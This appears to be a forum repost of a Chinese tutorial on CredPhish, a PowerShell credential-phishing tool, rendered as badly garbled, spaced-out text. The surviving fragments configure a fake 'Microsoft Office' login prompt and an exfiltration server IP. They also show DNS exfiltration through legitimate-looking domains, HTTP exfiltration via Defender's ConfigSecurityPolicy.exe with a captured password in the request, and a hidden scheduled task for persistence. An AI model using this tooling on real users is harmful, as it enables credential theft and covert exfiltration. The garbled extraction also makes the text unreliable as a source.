[20659] 2021-07-30_如何使用PowerShell钓鱼获取用户密码

文档创建者:s7ckTeam
浏览次数:2
最后更新:2025-01-18
2021-07-30_如何使用PowerShell钓鱼获取用户密码 使   P o w e r S h e l l   t o k y o n e o n   K h a n   2 0 2 1 - 0 7 - 3 0                   W i n d o w s     O u t l o o k V P N     W i n d o w s     P o w e r S h e l l     M I T R E   A T T & C K                       仿   P o w e r S h e l l       C r e d P h i s h                   C r e d P h i s h     P o w e r S h e l l   C r e d e n t i a l P i c k e r     A P I     P o w e r S h e l l     R e s o l v e - D n s N a m e     D N S W i n d o w s   D e f e n d e r   C o n f i g S e c u r i t y P o l i c y . e x e     G E T                       C r e d P h i s h     W i n d o w s     D N S    
                C r e d P h i s h   使   R e s o l v e - D n s N a m e P o w e r S h e l l     D N S     g o o g l e . c o m     o f f i c e . c o m   t o k y o n e o n ( 7 4 6 f 6 b 7 9 6 f 6 e 6 5 6 f 6 e )                       D N S   D N S     W i r e s h a r k   A n s w e r s   G o o g l e     I P     C r e d P h i s h . p s 1    
                c r e d p h i s h . p s 1         P S 1                       K a l i     #   e x f i l       $ e x f i l S e r v e r     =     " 1 9 2 . 1 6 8 . 5 6 . 1 1 2 "                             #   p r o m p t   $ t a r g e t U s e r     =     $   e n v   :   u s e r n a m e   $ c o m p a n y E m a i l     =     "   b l a c k h i l l s i n f o s e c . c o m   "   $ p r o m p t C a p t i o n     =     "   M i c r o s o f t   O f f i c e   "   $ p r o m p t M e s s a g e     =     "   C o n n e c t i n g   t o :   $ t a r g e t U s e r   @   $ c o m p a n y E m a i l   "   $ m a x T r i e s     =     1     #   $   d e l a y P r o m p t s     =     2     #   $ v a l i d a t e C r e d e n t i a l s     =     $   f a l s e     #     $ m a x T r i e s                       怀                   使         I m p o r t - M o d u l e $ p r o m p t C a p t i o n $ p r o m p t M e s s a g e $ m a x T r i e s 1 $ d e l a y P r o m p t s $ m a x T r i e s 1 $ v a l i d a t e C r e d e n t i a l s S t a r t - P r o c e s s $ m a x T r i e s
                  D N S                                                       D N S                                                             # #   k a l i d n s p y t h o n 3   / p a t h / t o / c r e d p h i s h / d n s _ s e r v e r . p y $   e n a b l e D n s E x f i l     =     $ $   e x f i l D o m a i n s     =   @ '   . m i c r o s o f t . c o m   '   '   . g o o g l e . c o m   '   '   . o f f i c e . c o m   '   '   . l i v e . c o m   ' D N S   e x f i l $   r a n d o m D e l a y     =     G E T   - 5     - 2 0     #   d n s   $ s u b d o m a i n L e n g t h     =     6     #     2 - 6 0                   使   D N S       K a l i     d n s _ s e r v e r . p y     +       D N S                       C r e d P h i s h     H T T P   W i n d o w s   D e f e n d e r     C o n f i g S e c u r i t y P o l i c y . e x e     $ e x f i l D o m a i n s $ s u b d o m a i n L e n g t h C t r l c $ e n a b l e H t t p E x f i l
        #   h t t p   #     k a l i     h t t p   p y t h o n 3   - m   h t t p . s e r v e r   8 0   $ e n a b l e H t t p E x f i l     =     $ f a l s e   $ C o n f i g S e c u r i t y P o l i c y     =     "   C : P r o g * F i l e s W i n * D e f e n d e r C o n f i g S e c u r i t y P o l i c y . e x e   "                 使       K a l i     H T T P     G E T   / D E S K T O P - S 4 D A A F 0 % 5 B t o k y o n e o n % 3 A % 2 3 ! E x t r 3 m 3 L y _ % 2 6 e c u R e - P % 4 0 s s w % 2 5 r D % 2 3 % 5 D   H T T P / 1 . 1     A c c e p t :   * / *     U A - C P U :   A M D 6 4     A c c e p t - E n c o d i n g :   g z i p ,   d e f l a t e     U s e r - A g e n t :   M o z i l l a   / 4 . 0 M S I E   7 . 0 W i n d o w s   N T   1 0 . 0 W i n 6 4 x 6 4 T r i d e n t / 7 . 0 . N E T 4 . 0 C . N E T 4 . 0 E   1 9 2 . 1 6 8 . 5 6 . 1 0 4   K e e p - A l i v e                       U R L   使   B u r p   使   P y t h o n     $ t r u e C o n f i g S e c u r i t y P o l i c y . e x e u r l l i b
    U R L     > > >     f r o m     u r l l i b . p a r s e     i m p o r t   u n q u o t e     > > >     u n q u o t e   ( " / D E S K T O P - S 4 D A A F 0 % 5 B t o k y o n e o n % 3 A % 2 3 ! E x t r 3 m 3 L y _ % 2 6 e c u R e - P % 4 0 s s w % 2 5 r D % 2 3 % 5 D " )     ' / D E S K T O P - S 4 D A A F 0 [ t o k y o n e o n : #   ! E x t r 3 m 3 L y _ &   e c u R e - P @ s s w   % r D # ] '     C r e d P h i s h . p s 1                       C r e d P h i s h         W i n d o w s   1 0   使   P o w e r S h e l l     c r e d p h i s h . p s 1
                  T a s k   S c h e d t o k y o n e o n   / / u l e r   W i n d o w s           2       s c h t a s k s   / c r e a t e   / s c   m i n u t e   / m o   2   / t n   " c r e d p h i s h "   / t r   " p o w e r s h e l l   - e p   b y p a s s   - W i n d o w S t y l e   H i d d e n   C : p a t h t o c r e d P h i s h c r e d p h i s h . p s 1 "   s c h t a s k s c r e d p h i s h . p s 1
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则